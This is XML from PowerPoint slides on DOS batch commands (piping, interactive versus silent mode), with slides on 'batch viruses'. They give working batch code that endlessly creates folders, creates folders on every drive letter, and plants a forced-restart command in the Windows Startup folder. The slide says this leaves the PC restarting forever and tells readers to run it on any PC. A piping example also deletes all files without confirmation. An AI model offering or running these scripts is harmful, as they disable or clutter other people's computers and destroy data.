            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143643894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IN" b="1" dirty="0" smtClean="0"/>
              <a:t>PIPING</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Piping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>is a feature which combines both Input and Output Redirection. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>It uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the Pipe operator, which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>the| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>symbol. This command captures the Output of one command and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>sends it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>as the Input of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>other command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Say for example, when you give the command del *.* then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>you need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>to confirm that you mean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>to delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>all files by pressing y. Instead we can simply do the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>without any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>User Interaction by giving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>the command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" smtClean="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>:\windows&gt; echo y | del *.*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This command is pretty self explanatory, y is sent to the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>del *.*</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127595204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710576" y="2792920"/>
            <a:ext cx="4731167" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Batch Viruses</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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5626" y="1981146"/>
            <a:ext cx="3728406" cy="2639209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203260142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en-US" dirty="0"/>
              <a:t>Many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Folders</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>code creates 1000’s of folders with number naming.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>  Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>----------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>:e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>%random%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>goto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>----------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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27951" y="3837518"/>
            <a:ext cx="2238375" cy="2038350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156865159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smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Undeletable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with Your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md c:\documents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ettings\users\desktop\akshay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:\akshay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:\akshay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:\akshay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:\akshay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:\akshay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:\akshay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>goto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>y</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8912505" y="4056204"/>
            <a:ext cx="2547213" cy="2090597"/>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64515" y="3082939"/>
            <a:ext cx="3209095" cy="3159889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63642769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en-US" dirty="0"/>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Restart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>irus</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>batch file code is restarts system when it starts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>---------------------------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>echo shutdown –r –f –t 00 &gt; shut.bat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>move shut.bat  C:\"Documents and Settings"\"All Users"\"Start Menu"\Programs\Startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>----------------------------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Copy  the above code and paste in notepad by name anything.bat  and runs on any </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Pc  then after next restart the system will never starts and automatically restarts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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12227">
            <a:off x="7472830" y="2923425"/>
            <a:ext cx="3936508" cy="2793651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210311761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2" y="982132"/>
            <a:ext cx="9601196" cy="1191052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>odes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>that are supported by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2392613"/>
            <a:ext cx="4718304" cy="576262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Interactive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2968876"/>
            <a:ext cx="4718304" cy="2906992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>In interactive mode, when a command is executed, it interacts with the user for input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>and depending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>upon the input supplied by the user, the further processes are carried out. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>let’s take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the ‘del’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" smtClean="0"/>
              <a:t>	C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>:\&gt;del a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" smtClean="0"/>
              <a:t>	C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>:\a\*, Are you sure (Y/N)? y</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6178294" y="2392613"/>
            <a:ext cx="4718304" cy="576262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Batch Mode (Silent Mode)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6180671" y="2968876"/>
            <a:ext cx="4718304" cy="2906992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Batch mode can also be referred as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>Quiet Mode’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, and this is opposite to the interactive mode. The command that operates at batch mode will never interact with the user at any instance, instead it will take care of every operation by itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>For example, using the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>‘del’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>command &amp; switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>‘/Q’ (Quite mode).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>C:\&gt;del /Q a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>	C:\&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384472738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73299" y="1276639"/>
            <a:ext cx="5839868" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For Loop Viruses</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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58947" y="1114593"/>
            <a:ext cx="8611564" cy="4857943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
